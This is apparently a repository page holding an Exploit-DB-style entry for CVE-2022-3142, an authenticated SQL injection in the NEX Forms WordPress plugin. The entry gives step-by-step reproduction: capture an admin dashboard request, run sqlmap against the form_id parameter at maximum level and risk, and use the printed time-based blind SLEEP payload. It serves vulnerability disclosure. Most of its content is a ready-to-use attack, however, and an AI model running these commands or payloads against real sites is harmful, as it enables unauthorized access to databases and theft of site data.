-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.txt
30 lines (21 loc) · 1.12 KB
/
exploit.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Exploit Title: "NEX Forms" WordPress plugin SQL Injection vulnerability
# Google Dork: N/A
# Date: 2022-08-01
# Exploit Author: Elias Hohl
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Version: < 7.9.7
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142
Authenticatd SQL injection vulnerability in the "NEX Forms" Wordpress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
1. Start a new Wordpress instance using docker-compose.
2. Install the NEX Forms plugin.
3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the
request to "nex-forms-req.txt" via Burp Suite.
4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: form_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)